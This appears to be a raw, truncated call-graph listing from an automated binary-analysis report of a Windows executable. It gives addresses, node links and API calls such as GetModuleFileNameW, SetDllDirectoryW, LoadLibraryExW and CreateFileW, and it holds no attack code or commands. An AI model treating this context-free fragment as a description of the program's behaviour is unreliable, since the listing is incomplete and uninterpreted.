7ff7f3dea900 17 API calls _isindst 22085->22124 22086 7ff7f3df6751 22120 7ff7f3dea8e0 37 API calls _invalid_parameter_noinfo 22086->22120 22090->22029 22090->22030 22125 7ff7f3df02d8 EnterCriticalSection 22092->22125 22104->22034 22105->22062 22117->22075 22118->22080 22119->22086 22120->22078 22121->22084 22122->22077 22123->22082 22127 7ff7f3de04ce 22126->22127 22128 7ff7f3de048e 22126->22128 22127->22128 22130 7ff7f3de04da 22127->22130 22138 7ff7f3dea814 37 API calls 2 library calls 22128->22138 22137 7ff7f3de546c EnterCriticalSection 22130->22137 22132 7ff7f3de04b5 22132->21916 22133 7ff7f3de04df 22134 7ff7f3de05e8 71 API calls 22133->22134 22135 7ff7f3de04f1 22134->22135 22136 7ff7f3de5478 _fread_nolock LeaveCriticalSection 22135->22136 22136->22132 22138->22132 22140 7ff7f3de0b0c 22139->22140 22149 7ff7f3de082c 22140->22149 22142 7ff7f3de0b2a 22142->21937 22143->21922 22144->21926 22145->21933 22146->21930 22147->21933 22148->21933 22150 7ff7f3de084c 22149->22150 22155 7ff7f3de0879 22149->22155 22151 7ff7f3de0856 22150->22151 22152 7ff7f3de0881 22150->22152 22150->22155 22163 7ff7f3dea814 37 API calls 2 library calls 22151->22163 22156 7ff7f3de076c 22152->22156 22155->22142 22164 7ff7f3de546c EnterCriticalSection 22156->22164 22158 7ff7f3de0789 22159 7ff7f3de07ac 74 API calls 22158->22159 22160 7ff7f3de0792 22159->22160 22161 7ff7f3de5478 _fread_nolock LeaveCriticalSection 22160->22161 22162 7ff7f3de079d 22161->22162 22162->22155 22163->22155 22166 7ff7f3ddfe43 22165->22166 22167 7ff7f3ddfe71 22165->22167 22176 7ff7f3dea814 37 API calls 2 library calls 22166->22176 22169 7ff7f3ddfe63 22167->22169 22175 7ff7f3de546c EnterCriticalSection 22167->22175 22169->21942 22171 7ff7f3ddfe88 22172 7ff7f3ddfea4 72 API calls 22171->22172 22173 7ff7f3ddfe94 22172->22173 22174 7ff7f3de5478 _fread_nolock LeaveCriticalSection 22173->22174 22174->22169 22176->22169 22178 7ff7f3de03e6 22177->22178 22179 7ff7f3de03b4 22177->22179 22178->22179 22180 7ff7f3de03f5 memcpy_s 22178->22180 22181 7ff7f3de0432 22178->22181 22179->21873 22191 7ff7f3de4f08 11 API calls _set_fmode 22180->22191 22190 7ff7f3de546c EnterCriticalSection 22181->22190 22184 7ff7f3de043a 22186 7ff7f3de013c _fread_nolock 51 API calls 22184->22186 22185 7ff7f3de040a 22192 7ff7f3dea8e0 37 API calls _invalid_parameter_noinfo 22185->22192 22188 7ff7f3de0451 22186->22188 22189 7ff7f3de5478 _fread_nolock LeaveCriticalSection 22188->22189 22189->22179 22191->22185 22192->22179 22197 7ff7f3de49de 22193->22197 22194 7ff7f3de4a03 22211 7ff7f3dea814 37 API calls 2 library calls 22194->22211 22196 7ff7f3de4a3f 22212 7ff7f3de2c10 49 API calls _invalid_parameter_noinfo 22196->22212 22197->22194 22197->22196 22199 7ff7f3de4b1c 22215 7ff7f3dea948 11 API calls 2 library calls 22199->22215 22200 7ff7f3ddc550 _log10_special 8 API calls 22203 7ff7f3dd1cc8 22200->22203 22202 7ff7f3de4ad6 22202->22199 22204 7ff7f3de4b40 22202->22204 22205 7ff7f3de4af1 22202->22205 22208 7ff7f3de4ae8 22202->22208 22203->21836 22204->22199 22206 7ff7f3de4b4a 22204->22206 22213 7ff7f3dea948 11 API calls 2 library calls 22205->22213 22214 7ff7f3dea948 11 API calls 2 library calls 22206->22214 22208->22199 22208->22205 22210 7ff7f3de4a2d 22210->22200 22211->22210 22212->22202 22213->22210 22214->22210 22215->22210 22216->21883 22236 7ff7f3ddc850 22217->22236 22220 7ff7f3dd23e5 memcpy_s 22238 7ff7f3dd25c0 22220->22238 22222 7ff7f3dd242b memcpy_s 22242 7ff7f3de796c 22222->22242 22225 7ff7f3de796c 37 API calls 22226 7ff7f3dd245e 22225->22226 22227 7ff7f3de796c 37 API calls 22226->22227 22228 7ff7f3dd246b DialogBoxIndirectParamW 22227->22228 22229 7ff7f3dd24a1 __std_exception_destroy 22228->22229 22230 7ff7f3dd24c1 DeleteObject 22229->22230 22231 7ff7f3dd24c7 22229->22231 22230->22231 22232 7ff7f3dd24d3 DestroyIcon 22231->22232 22233 7ff7f3dd24d9 22231->22233 22232->22233 22234 7ff7f3ddc550 _log10_special 8 API calls 22233->22234 22235 7ff7f3dd24ea 22234->22235 22235->21895 22237 7ff7f3dd23a9 GetModuleHandleW 22236->22237 22237->22220 22239 7ff7f3dd25e5 22238->22239 22250 7ff7f3de4bd8 22239->22250 22243 7ff7f3de798a 22242->22243 22246 7ff7f3dd2451 22242->22246 22243->22246 22273 7ff7f3df0474 37 API calls 2 library calls 22243->22273 22245 7ff7f3de79b9 22245->22246 22247 7ff7f3de79d9 22245->22247 22246->22225 22274 7ff7f3dea900 17 API calls _isindst 22247->22274 22252 7ff7f3de4c32 22250->22252 22251 7ff7f3de4c57 22268 7ff7f3dea814 37 API calls 2 library calls 22251->22268 22252->22251 22254 7ff7f3de4c93 22252->22254 22269 7ff7f3de2f90 48 API calls _invalid_parameter_noinfo 22254->22269 22256 7ff7f3de4c81 22257 7ff7f3ddc550 _log10_special 8 API calls 22256->22257 22260 7ff7f3dd2604 22257->22260 22259 7ff7f3de4d2e 22261 7ff7f3de4d74 22259->22261 22262 7ff7f3de4d49 22259->22262 22263 7ff7f3de4d9a 22259->22263 22265 7ff7f3de4d40 22259->22265 22260->22222 22272 7ff7f3dea948 11 API calls 2 library calls 22261->22272 22270 7ff7f3dea948 11 API calls 2 library calls 22262->22270 22263->22261 22266 7ff7f3de4da4 22263->22266 22265->22261 22265->22262 22271 7ff7f3dea948 11 API calls 2 library calls 22266->22271 22268->22256 22269->22259 22270->22256 22271->22256 22272->22256 22273->22245 22856 7ffe126d0498 38 API calls __CxxDetectRethrow 22884 7ff7f3ddfdf0 GetCommandLineA GetCommandLineW 22826 7ffe126c2b80 terminate 22885 7ffe126c6980 InterlockedFlushSList free 21789 7ff7f3dd20c0 21790 7ff7f3dd213b GetWindowLongPtrW 21789->21790 21792 7ff7f3dd20d5 21789->21792 21799 7ff7f3dd2180 GetDC 21790->21799 21795 7ff7f3dd20e2 21792->21795 21796 7ff7f3dd210a SetWindowLongPtrW 21792->21796 21793 7ff7f3dd20f4 EndDialog 21798 7ff7f3dd20fa 21793->21798 21795->21793 21795->21798 21797 7ff7f3dd2124 21796->21797 21800 7ff7f3dd224d 21799->21800 21801 7ff7f3dd21bd 21799->21801 21802 7ff7f3dd2252 MoveWindow MoveWindow MoveWindow MoveWindow 21800->21802 21803 7ff7f3dd21ef SelectObject 21801->21803 21804 7ff7f3dd21fb DrawTextW 21801->21804 21809 7ff7f3ddc550 21802->21809 21803->21804 21806 7ff7f3dd2225 SelectObject 21804->21806 21807 7ff7f3dd2231 ReleaseDC 21804->21807 21806->21807 21807->21802 21810 7ff7f3ddc559 21809->21810 21811 7ff7f3dd2158 InvalidateRect 21810->21811 21812 7ff7f3ddc8e0 IsProcessorFeaturePresent 21810->21812 21811->21798 21813 7ff7f3ddc8f8 21812->21813 21818 7ff7f3ddcad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 21813->21818 21815 7ff7f3ddc90b 21819 7ff7f3ddc8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21815->21819 21818->21815 22796 7ff7f3dd80c0 85 API calls 22797 7ff7f3df9cbc 55 API calls __CxxCallCatchBlock 22828 7ffe126c676f RtlPcToFileHeader RtlPcToFileHeader RaiseException 22861 7ffe126d0870 RtlUnwindEx __GSHandlerCheck_SEH __GSHandlerCheckCommon 22862 7ff7f3ddf6ba 55 API calls __CxxCallCatchBlock 22863 7ff7f3de52d0 17 API calls 2 library calls 22864 7ffe126c6c60 14 API calls __CxxDetectRethrow 22799 7ff7f3ddf4c8 37 API calls __std_exception_copy 22800 7ff7f3df08c8 77 API calls 4 library calls 22831 7ff7f3dd6ba0 49 API calls _log10_special 22866 7ffe126c4c50 14 API calls 3 library calls 22867 7ffe126c5c50 22 API calls 4 library calls 22833 7ffe126c4b54 malloc strcpy_s free 22889 7ff7f3ddcdb0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 22870 7ff7f3df16b0 74 API calls 2 library calls 22890 7ffe126c4d4a 15 API calls 2 library calls 22802 7ffe126c2240 RtlUnwind 22803 7ffe126c4e40 15 API calls 3 library calls 22804 7ff7f3dda983 12 API calls 22805 7ff7f3dd6c80 10 API calls 22806 7ff7f3df3480 GetProcessHeap 22872 7ff7f3df0290 7 API calls 22892 7ffe126c662a RtlPcToFileHeader RtlPcToFileHeader RtlPcToFileHeader RaiseException FindMITargetTypeInstance 22807 7ffe126c2b20 13 API calls __CxxDetectRethrow 22893 7ff7f3def98c 55 API calls 4 library calls 22874 7ff7f3ddf288 59 API calls 5 library calls 22838 7ffe126cf420 15 API calls 2 library calls 22894 7ff7f3ddcd64 GetModuleHandleW __CxxCallCatchBlock 22808 7ff7f3ddd860 10 API calls 2 library calls 22895 7ff7f3de9961 57 API calls 22809 7ff7f3df1460 55 API calls 3 library calls 22876 7ff7f3def260 FreeLibrary 22896 7ff7f3dec560 12 API calls 22811 7ff7f3df1874 44 API calls 5 library calls 22812 7ffe126c55c3 21 API calls 4 library calls 22900 7ff7f3dd8540 Sleep 22275 7ff7f3ddcc3c 22296 7ff7f3ddce0c 22275->22296 22278 7ff7f3ddcd88 22447 7ff7f3ddd12c 7 API calls 2 library calls 22278->22447 22279 7ff7f3ddcc58 __scrt_acquire_startup_lock 22281 7ff7f3ddcd92 22279->22281 22288 7ff7f3ddcc76 __scrt_release_startup_lock 22279->22288 22448 7ff7f3ddd12c 7 API calls 2 library calls 22281->22448 22283 7ff7f3ddcc9b 22284 7ff7f3ddcd9d __CxxCallCatchBlock 22285 7ff7f3ddcd21 22302 7ff7f3ddd274 22285->22302 22287 7ff7f3ddcd26 22305 7ff7f3dd1000 22287->22305 22288->22283 22288->22285 22444 7ff7f3de9b2c 45 API calls 22288->22444 22294 7ff7f3ddcd49 22294->22284 22446 7ff7f3ddcf90 7 API calls 22294->22446 22295 7ff7f3ddcd60 22295->22283 22297 7ff7f3ddce14 22296->22297 22298 7ff7f3ddce20 __scrt_dllmain_crt_thread_attach 22297->22298 22299 7ff7f3ddce2d 22298->22299 22301 7ff7f3ddcc50 22298->22301 22299->22301 22449 7ff7f3ddd888 7 API calls 2 library calls 22299->22449 22301->22278 22301->22279 22450 7ff7f3dfa4d0 22302->22450 22304 7ff7f3ddd28b GetStartupInfoW 22304->22287 22306 7ff7f3dd1009 22305->22306 22452 7ff7f3de5484 22306->22452 22308 7ff7f3dd37fb 22459 7ff7f3dd36b0 22308->22459 22312 7ff7f3ddc550 _log10_special 8 API calls 22314 7ff7f3dd3ca7 22312->22314 22445 7ff7f3ddd2b8 GetModuleHandleW 22314->22445 22315 7ff7f3dd391b 22317 7ff7f3dd45c0 108 API calls 22315->22317 22316 7ff7f3dd383c 22318 7ff7f3dd1c80 49 API calls 22316->22318 22319 7ff7f3dd392b 22317->22319 22320 7ff7f3dd385b 22318->22320 22321 7ff7f3dd396a 22319->22321 22554 7ff7f3dd7f90 22319->22554 22531 7ff7f3dd8830 22320->22531 22563 7ff7f3dd2710 54 API calls _log10_special 22321->22563 22325 7ff7f3dd388e 22332 7ff7f3dd38bb __std_exception_destroy 22325->22332 22553 7ff7f3dd89a0 40 API calls __std_exception_destroy 22325->22553 22326 7ff7f3dd395d 22327 7ff7f3dd3984 22326->22327 22328 7ff7f3dd3962 22326->22328 22331 7ff7f3dd1c80 49 API calls 22327->22331 22330 7ff7f3de004c 74 API calls 22328->22330 22330->22321 22333 7ff7f3dd39a3 22331->22333 22334 7ff7f3dd8830 14 API calls 22332->22334 22342 7ff7f3dd38de __std_exception_destroy 22332->22342 22337 7ff7f3dd1950 115 API calls 22333->22337 22334->22342 22336 7ff7f3dd3a0b 22566 7ff7f3dd89a0 40 API calls __std_exception_destroy 22336->22566 22339 7ff7f3dd39ce 22337->22339 22339->22320 22341 7ff7f3dd39de 22339->22341 22340 7ff7f3dd3a17 22567 7ff7f3dd89a0 40 API calls __std_exception_destroy 22340->22567 22564 7ff7f3dd2710 54 API calls _log10_special 22341->22564 22347 7ff7f3dd390e __std_exception_destroy 22342->22347 22565 7ff7f3dd8940 40 API calls __std_exception_destroy 22342->22565 22345 7ff7f3dd3a23 22568 7ff7f3dd89a0 40 API calls __std_exception_destroy 22345->22568 22348 7ff7f3dd8830 14 API calls 22347->22348 22349 7ff7f3dd3a3b 22348->22349 22350 7ff7f3dd3b2f 22349->22350 22351 7ff7f3dd3a60 __std_exception_destroy 22349->22351 22570 7ff7f3dd2710 54 API calls _log10_special 22350->22570 22359 7ff7f3dd3aab 22351->22359 22569 7ff7f3dd8940 40 API calls __std_exception_destroy 22351->22569 22353 7ff7f3dd3808 __std_exception_destroy 22353->22312 22355 7ff7f3dd8830 14 API calls 22356 7ff7f3dd3bf4 __std_exception_destroy 22355->22356 22357 7ff7f3dd3c46 22356->22357 22358 7ff7f3dd3d41 22356->22358 22360 7ff7f3dd3cd4 22357->22360 22361 7ff7f3dd3c50 22357->22361 22575 7ff7f3dd44e0 49 API calls 22358->22575 22359->22355 22364 7ff7f3dd8830 14 API calls 22360->22364 22571 7ff7f3dd90e0 59 API calls _log10_special 22361->22571 22367 7ff7f3dd3ce0 22364->22367 22365 7ff7f3dd3d4f 22368 7ff7f3dd3d65 22365->22368 22369 7ff7f3dd3d71 22365->22369 22366 7ff7f3dd3c55 22371 7ff7f3dd3cb3 22366->22371 22372 7ff7f3dd3c61 22366->22372 22367->22372 22375 7ff7f3dd3ced 22367->22375 22576 7ff7f3dd4630 22368->22576 22370 7ff7f3dd1c80 49 API calls 22369->22370 22385 7ff7f3dd3d2b __std_exception_destroy 22370->22385 22573 7ff7f3dd8660 86 API calls 2 library calls 22371->22573 22572 7ff7f3dd2710 54 API calls _log10_special 22372->22572 22379 7ff7f3dd1c80 49 API calls 22375->22379 22376 7ff7f3dd3dbc 22381 7ff7f3dd9390 2 API calls 22376->22381 22377 7ff7f3dd3cbb 22382 7ff7f3dd3cbf 22377->22382 22383 7ff7f3dd3cc8 22377->22383 22380 7ff7f3dd3d0b 22379->22380 22384 7ff7f3dd3d12 22380->22384 22380->22385 22387 7ff7f3dd3dcf SetDllDirectoryW 22381->22387 22382->22372 22383->22385 22574 7ff7f3dd2710 54 API calls _log10_special 22384->22574 22385->22376 22386 7ff7f3dd3da7 LoadLibraryExW 22385->22386 22386->22376 22390 7ff7f3dd3e02 22387->22390 22432 7ff7f3dd3e52 22387->22432 22392 7ff7f3dd8830 14 API calls 22390->22392 22391 7ff7f3dd4000 22394 7ff7f3dd402d 22391->22394 22395 7ff7f3dd400a PostMessageW GetMessageW 22391->22395 22398 7ff7f3dd3e0e __std_exception_destroy 22392->22398 22393 7ff7f3dd3f13 22587 7ff7f3dd33c0 121 API calls 2 library calls 22393->22587 22544 7ff7f3dd3360 22394->22544 22395->22394 22397 7ff7f3dd3f1b 22397->22353 22399 7ff7f3dd3f23 22397->22399 22402 7ff7f3dd3eea 22398->22402 22406 7ff7f3dd3e46 22398->22406 22588 7ff7f3dd90c0 LocalFree 22399->22588 22586 7ff7f3dd8940 40 API calls __std_exception_destroy 22402->22586 22406->22432 22579 7ff7f3dd6dc0 54 API calls _set_fmode 22406->22579 22408 7ff7f3dd4047 22590 7ff7f3dd6fc0 FreeLibrary 22408->22590 22414 7ff7f3dd4053 22417 7ff7f3dd3e64 22580 7ff7f3dd7340 117 API calls 2 library calls 22417->22580 22421 7ff7f3dd3e79 22423 7ff7f3dd3e9a 22421->22423 22435 7ff7f3dd3e7d 22421->22435 22581 7ff7f3dd6e00 120 API calls _log10_special 22421->22581 22423->22435 22582 7ff7f3dd71b0 125 API calls 22423->22582 22427 7ff7f3dd3eaf 22427->22435 22583 7ff7f3dd74f0 55 API calls 22427->22583 22429 7ff7f3dd3ed8 22585 7ff7f3dd6fc0 FreeLibrary 22429->22585 22432->22391 22432->22393 22435->22432 22584 7ff7f3dd2a50 54 API calls _log10_special 22435->22584 22444->22285 22445->22294 22446->22295 22447->22281 22448->22284 22449->22301 22451 7ff7f3dfa4c0 22450->22451 22451->22304 22451->22451 22455 7ff7f3def480 22452->22455 22453 7ff7f3def4d3 22591 7ff7f3dea814 37 API calls 2 library calls 22453->22591 22455->22453 22456 7ff7f3def526 22455->22456 22592 7ff7f3def358 71 API calls _fread_nolock 22456->22592 22458 7ff7f3def4fc 22458->22308 22460 7ff7f3ddc850 22459->22460 22461 7ff7f3dd36bc GetModuleFileNameW 22460->22461 22462 7ff7f3dd3710 22461->22462 22463 7ff7f3dd36eb GetLastError 22461->22463 22593 7ff7f3dd9280 FindFirstFileExW 22462->22593 22598 7ff7f3dd2c50 51 API calls _log10_special 22463->22598 22466 7ff7f3dd3706 22470 7ff7f3ddc550 _log10_special 8 API calls 22466->22470 22468 7ff7f3dd3723 22599 7ff7f3dd9300 CreateFileW GetFinalPathNameByHandleW CloseHandle 22468->22599 22469 7ff7f3dd377d 22601 7ff7f3dd9440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 22469->22601 22474 7ff7f3dd37b5 22470->22474 22473 7ff7f3dd378b 22473->22466 22602 7ff7f3dd2810 49 API calls _log10_special 22473->22602 22474->22353 22481 7ff7f3dd1950 22474->22481 22475 7ff7f3dd3730 22476 7ff7f3dd3734 22475->22476 22477 7ff7f3dd374c __vcrt_InitializeCriticalSectionEx 22475->22477 22600 7ff7f3dd2810 49 API calls _log10_special 22476->22600 22477->22469 22480 7ff7f3dd3745 22480->22466 22482 7ff7f3dd45c0 108 API calls 22481->22482 22483 7ff7f3dd1985 22482->22483 22484 7ff7f3dd1c43 22483->22484 22486 7ff7f3dd7f90 83 API calls 22483->22486 22485 7ff7f3ddc550 _log10_special 8 API calls 22484->22485 22487 7ff7f3dd1c5e 22485->22487 22488 7ff7f3dd19cb 22486->22488 22487->22315 22487->22316 22489 7ff7f3de06d4 73 API calls 22488->22489 22530 7ff7f3dd1a03 22488->22530 22491 7ff7f3dd19e5 22489->22491 22490 7ff7f3de004c 74 API calls 22490->22484 22492 7ff7f3dd1a08 22491->22492 22493 7ff7f3dd19e9 22491->22493 22495 7ff7f3de039c _fread_nolock 53 API calls 22492->22495 22603 7ff7f3de4f08 11 API calls _set_fmode 22493->22603 22497 7ff7f3dd1a20 22495->22497 22496 7ff7f3dd19ee 22604 7ff7f3dd2910 54 API calls _log10_special 22496->22604 22499 7ff7f3dd1a45 22497->22499 22500 7ff7f3dd1a26 22497->22500 22504 7ff7f3dd1a7b 22499->22504 22505 7ff7f3dd1a5c 22499->22505 22605 7ff7f3de4f08 11 API calls _set_fmode 22500->22605 22502 7ff7f3dd1a2b 22606 7ff7f3dd2910 54 API calls _log10_special 22502->22606 22507 7ff7f3dd1c80 49 API calls 22504->22507 22607 7ff7f3de4f08 11 API calls _set_fmode 22505->22607 22509 7ff7f3dd1a92 22507->22509 22508 7ff7f3dd1a61 22608 7ff7f3dd2910 54 API calls _log10_special 22508->22608 22511 7ff7f3dd1c80 49 API calls 22509->22511 22512 7ff7f3dd1add 22511->22512 22513 7ff7f3de06d4 73 API calls 22512->22513 22514 7ff7f3dd1b01 22513->22514 22515 7ff7f3dd1b35 22514->22515 22516 7ff7f3dd1b16 22514->22516 22517 7ff7f3de039c _fread_nolock 53 API calls 22515->22517 22609 7ff7f3de4f08 11 API calls _set_fmode 22516->22609 22519 7ff7f3dd1b4a 22517->22519 22522 7ff7f3dd1b6f 22519->22522 22523 7ff7f3dd1b50 22519->22523 22520 7ff7f3dd1b1b 22610 7ff7f3dd2910 54 API calls _log10_special 22520->22610 22613 7ff7f3de0110 37 API calls 2 library calls 22522->22613 22611 7ff7f3de4f08 11 API calls _set_fmode 22523->22611 22526 7ff7f3dd1b55 22612 7ff7f3dd2910 54 API calls _log10_special 22526->22612 22527 7ff7f3dd1b89 22527->22530 22614 7ff7f3dd2710 54 API calls _log10_special 22527->22614 22530->22490 22532 7ff7f3dd883a 22531->22532 22533 7ff7f3dd9390 2 API calls 22532->22533 22534 7ff7f3dd8859 GetEnvironmentVariableW 22533->22534 22535 7ff7f3dd8876 ExpandEnvironmentStringsW 22534->22535 22536 7ff7f3dd88c2 22534->22536 22535->22536 22538 7ff7f3dd8898 22535->22538 22537 7ff7f3ddc550 _log10_special 8 API calls 22536->22537 22540 7ff7f3dd88d4 22537->22540 22615 7ff7f3dd9440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 22538->22615 22540->22325 22541 7ff7f3dd88aa 22542 7ff7f3ddc550 _log10_special 8 API calls 22541->22542 22543 7ff7f3dd88ba 22542->22543 22543->22325 22616 7ff7f3dd6360 22544->22616 22547 7ff7f3dd3399 22589 7ff7f3dd3670 FreeLibrary 22547->22589 22549 7ff7f3dd3381 22549->22547 22684 7ff7f3dd6050 22549->22684 22551 7ff7f3dd338d 22551->22547 22693 7ff7f3dd61e0 54 API calls 22551->22693 22553->22332 22555 7ff7f3dd7fb4 22554->22555 22556 7ff7f3dd808b __std_exception_destroy 22555->22556 22557 7ff7f3de06d4 73 API calls 22555->22557 22556->22326 22558 7ff7f3dd7fd0 22557->22558 22558->22556 22747 7ff7f3de78c8 22558->22747 22560 7ff7f3dd7fe5 22560->22556 22561 7ff7f3de06d4 73 API calls 22560->22561 22562 7ff7f3de039c _fread_nolock 53 API calls 22560->22562 22561->22560 22562->22560 22563->22353 22564->22353 22565->22336 22566->22340 22567->22345 22568->22347 22569->22359 22570->22353 22571->22366 22572->22353 22573->22377 22574->22353 22575->22365 22577 7ff7f3dd1c80 49 API calls 22576->22577 22578 7ff7f3dd4660 22577->22578 22578->22385 22579->22417 22580->22421 22581->22423 22582->22427 22583->22435 22584->22429 22585->22432 22586->22432 22587->22397 22589->22408 22590->22414 22591->22458 22592->22458 22594 7ff7f3dd92bf FindClose 22593->22594 22595 7ff7f3dd92d2 22593->22595 22594->22595 22596 7ff7f3ddc550 _log10_special 8 API calls 22595->22596 22597 7ff7f3dd371a 22596->22597 22597->22468 22597->22469 22598->22466 22599->22475 22600->22480 22601->22473 22602->22466 22603->22496 22604->22530 22605->22502 22606->22530 22607->22508 22608->22530 22609->22520 22610->22530 22611->22526 22612->22530 22613->22527 22614->22530 22615->22541 22617 7ff7f3dd6375 22616->22617 22618 7ff7f3dd1c80 49 API calls 22617->22618 22619 7ff7f3dd63b1 22618->22619 22620 7ff7f3dd63dd 22619->22620 22621 7ff7f3dd63ba 22619->22621 22622 7ff7f3dd4630 49 API calls 22620->22622 22704 7ff7f3dd2710 54 API calls _log10_special 22621->22704 22624 7ff7f3dd63f5 22622->22624 22625 7ff7f3dd6413 22624->22625 22705 7ff7f3dd2710 54 API calls _log10_special 22624->22705 22694 7ff7f3dd4560 22625->22694 22628 7ff7f3ddc550 _log10_special 8 API calls 22629 7ff7f3dd336e 22628->22629 22629->22547 22647 7ff7f3dd6500 22629->22647 22631 7ff7f3dd642b 22633 7ff7f3dd4630 49 API calls 22631->22633 22632 7ff7f3dd8e80 3 API calls 22632->22631 22634 7ff7f3dd6444 22633->22634 22635 7ff7f3dd6469 22634->22635 22636 7ff7f3dd6449 22634->22636 22700 7ff7f3dd8e80 22635->22700 22706 7ff7f3dd2710 54 API calls _log10_special 22636->22706 22639 7ff7f3dd6476 22641 7ff7f3dd64c1 22639->22641 22642 7ff7f3dd6482 22639->22642 22640 7ff7f3dd63d3 22640->22628 22708 7ff7f3dd5830 137 API calls 22641->22708 22643 7ff7f3dd9390 2 API calls 22642->22643 22645 7ff7f3dd649a GetLastError 22643->22645 22707 7ff7f3dd2c50 51 API calls _log10_special 22645->22707 22709 7ff7f3dd5400 22647->22709 22649 7ff7f3dd6526 22650 7ff7f3dd653f 22649->22650 22651 7ff7f3dd652e 22649->22651 22716 7ff7f3dd4c90 22650->22716 22734 7ff7f3dd2710 54 API calls _log10_special 22651->22734 22655 7ff7f3dd654b 22735 7ff7f3dd2710 54 API calls _log10_special 22655->22735 22656 7ff7f3dd655c 22659 7ff7f3dd656c 22656->22659 22661 7ff7f3dd657d 22656->22661 22658 7ff7f3dd653a 22658->22549 22736 7ff7f3dd2710 54 API calls _log10_special 22659->22736 22662 7ff7f3dd659c 22661->22662 22663 7ff7f3dd65ad 22661->22663 22737 7ff7f3dd2710 54 API calls _log10_special 22662->22737 22665 7ff7f3dd65bc 22663->22665 22666 7ff7f3dd65cd 22663->22666 22738 7ff7f3dd2710 54 API calls _log10_special 22665->22738 22720 7ff7f3dd4d50 22666->22720 22670 7ff7f3dd65dc 22739 7ff7f3dd2710 54 API calls _log10_special 22670->22739 22671 7ff7f3dd65ed 22673 7ff7f3dd65fc 22671->22673 22674 7ff7f3dd660d 22671->22674 22740 7ff7f3dd2710 54 API calls _log10_special 22673->22740 22676 7ff7f3dd661f 22674->22676 22678 7ff7f3dd6630 22674->22678 22741 7ff7f3dd2710 54 API calls _log10_special 22676->22741 22681 7ff7f3dd665a 22678->22681 22742 7ff7f3de72b0 73 API calls 22678->22742 22680 7ff7f3dd6648 22743 7ff7f3de72b0 73 API calls 22680->22743 22681->22658 22744 7ff7f3dd2710 54 API calls _log10_special 22681->22744 22685 7ff7f3dd6070 22684->22685 22686 7ff7f3dd6099 22685->22686 22692 7ff7f3dd60b0 __std_exception_destroy 22685->22692 22746 7ff7f3dd2710 54 API calls _log10_special 22686->22746 22688 7ff7f3dd60a5 22688->22551 22689 7ff7f3dd61bb 22689->22551 22690 7ff7f3dd1470 116 API calls 22690->22692 22691 7ff7f3dd2710 54 API calls 22691->22692 22692->22689 22692->22690 22692->22691 22693->22547 22695 7ff7f3dd456a 22694->22695 22696 7ff7f3dd9390 2 API calls 22695->22696 22697 7ff7f3dd458f 22696->22697 22698 7ff7f3ddc550 _log10_special 8 API calls 22697->22698 22699 7ff7f3dd45b7 22698->22699 22699->22631 22699->22632 22701 7ff7f3dd9390 2 API calls 22700->22701 22702 7ff7f3dd8e94 LoadLibraryExW 22701->22702 22703 7ff7f3dd8eb3 __std_exception_destroy 22702->22703 22703->22639 22704->22640 22705->22625 22706->22640 22707->22640 22708->22640 22711 7ff7f3dd542c 22709->22711 22710 7ff7f3dd5434 22710->22649 22711->22710 22714 7ff7f3dd55d4 22711->22714 22745 7ff7f3de6aa4 48 API calls 22711->22745 22712 7ff7f3dd5797 __std_exception_destroy 22712->22649 22713 7ff7f3dd47d0 47 API calls 22713->22714 22714->22712 22714->22713 22717 7ff7f3dd4cc0 22716->22717 22718 7ff7f3ddc550 _log10_special 8 API calls 22717->22718 22719 7ff7f3dd4d2a 22718->22719 22719->22655 22719->22656 22721 7ff7f3dd4d65 22720->22721 22722 7ff7f3dd1c80 49 API calls 22721->22722 22723 7ff7f3dd4db1 22722->22723 22724 7ff7f3dd1c80 49 API calls 22723->22724 22733 7ff7f3dd4e33 __std_exception_destroy 22723->22733 22725 7ff7f3dd4df0 22724->22725 22728 7ff7f3dd9390 2 API calls 22725->22728 22725->22733 22726 7ff7f3ddc550 _log10_special 8 API calls 22727 7ff7f3dd4e7e 22726->22727 22727->22670 22727->22671 22729 7ff7f3dd4e06 22728->22729 22730 7ff7f3dd9390 2 API calls 22729->22730 22731 7ff7f3dd4e1d 22730->22731 22732 7ff7f3dd9390 2 API calls 22731->22732 22732->22733 22733->22726 22734->22658 22735->22658 22736->22658 22737->22658 22738->22658 22739->22658 22740->22658 22741->22658 22742->22680 22743->22681 22744->22658 22745->22711 22746->22688 22748 7ff7f3de78f8 22747->22748 22751 7ff7f3de73d4 22748->22751 22750 7ff7f3de7911 22750->22560 22752 7ff7f3de73ef 22751->22752 22753 7ff7f3de741e 22751->22753 22762 7ff7f3dea814 37 API calls 2 library calls 22752->22762 22761 7ff7f3de546c EnterCriticalSection 22753->22761 22756 7ff7f3de740f 22756->22750 22757 7ff7f3de7423 22758 7ff7f3de7440 38 API calls 22757->22758 22759 7ff7f3de742f 22758->22759 22760 7ff7f3de5478 _fread_nolock LeaveCriticalSection 22759->22760 22760->22756 22762->22756 22902 7ffe126c69f0 21 API calls __unDName 22845 7ffe126c5327 15 API calls 5 library calls 22846 7ff7f3ddcb50 57 API calls 2 library calls 22903 7ff7f3de9d50 11 API calls 22904 7ff7f3df7d50 CloseHandle 22848 7ffe126c4be4 free 22880 7ffe126c44e4 43 API calls 4 library calls 22815 7ff7f3ddcc20 38 API calls 2 library calls 22849 7ff7f3ddd320 54 API calls 22816 7ff7f3df7c20 65 API calls 22908 7ff7f3dec520 47 API calls _isindst 22910 7ffe126d0558 21 API calls _DllMainCRTStartup 22819 7ffe126c2ac0 14 API calls 2 library calls 22851 7ffe126c6bc0 9 API calls __vcrt_getptd_noinit 22763 7ff7f3de5628 22764 7ff7f3de565f 22763->22764 22765 7ff7f3de5642 22763->22765 22764->22765 22766 7ff7f3de5672 CreateFileW 22764->22766 22788 7ff7f3de4ee8 11 API calls _set_fmode 22765->22788 22768 7ff7f3de56a6 22766->22768 22769 7ff7f3de56dc 22766->22769 22791 7ff7f3de577c 59 API calls 3 library calls 22768->22791 22792 7ff7f3de5c04 46 API calls 3 library calls 22769->22792 22770 7ff7f3de5647 22789 7ff7f3de4f08 11 API calls _set_fmode 22770->22789 22774 7ff7f3de56b4 22777 7ff7f3de56d1 CloseHandle 22774->22777 22778 7ff7f3de56bb CloseHandle 22774->22778 22775 7ff7f3de56e1 22779 7ff7f3de56e5 22775->22779 22780 7ff7f3de5710 22775->22780 22776 7ff7f3de564f 22790 7ff7f3dea8e0 37 API calls 